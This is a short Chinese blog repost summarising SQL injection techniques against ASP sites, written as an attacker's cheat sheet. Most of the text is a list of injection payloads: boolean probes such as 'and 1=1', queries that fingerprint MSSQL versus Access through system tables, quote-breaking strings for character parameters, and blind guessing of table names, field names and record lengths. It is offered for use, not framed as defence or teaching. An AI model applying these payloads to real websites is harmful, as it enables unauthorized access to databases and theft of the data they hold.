sql注入总结-白红宇

强烈建议你试试无所不能的chatGPT，快点击我

sql注入总结

阅读量：5918 次

发布时间：2019-06-19

本文共 496 字，大约阅读时间需要 1 分钟。

sql注入总结

总结asp注入时用到的方法

　 1.判断是否有注入

;and 1=1

;and 1=2

　 2.初步判断是否是mssql

;and user>0

　 3.判断数据库系统

;and (select count(*) from sysobjects)>0　　 mssql

;and (select count(*) from msysobjects)>0　　access

　 4.注入参数是字符

''''and [查询条件] and ''''''''=''''

　 5.搜索时没过滤参数的

''''and [查询条件] and ''''%25''''=''''

　 6.猜数据库

;and (Select Count(*) from [数据库名])>0

　 7.猜字段

;and (Select Count(字段名) from 数据库名)>0

　 8.猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)>0

....

www veryasp cn

转载于:https://blog.51cto.com/batcracker/673581

你可能感兴趣的文章

26基本数据类型的常用方法

[Node.js]EventEmitter

文本超出部分省略（包括多行文本超出部分省略显示）

天地图之定位信息详解

ifconfig命令详情

解决Android中图片圆角——.9图

FortiGate软件版本升级

shell 光标处理快捷键

ffmpeg编译常规大全

从Element.getElementsByTagName方法说起

你想面试运维看一下你合格了吗？

[STM32F429-DISCO-uCosiii]3.uCOSIII 移植

WEB前端研发工程师编程能力成长之路

前端学PHP之文件操作

LeetCode | Copy List with Random Pointer

LeetCode | Regular Expression Matching

C语言博客05--指针

十四、过滤函数-筛选对象集合

喝酒易醉，品茶养心，人生如梦，品茶悟道，何以解忧？唯有杜康！-- 愿君每日到此一游！

当前时间: 2024-12-27 18:19:01 当前IP: 18.219.44.171 联系邮箱:javaeecc@qq.com Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2

强烈建议你试试无所不能的CHAT-GPT，快点击我

强烈建议你试试无所不能的CHAT-GPT，快点击我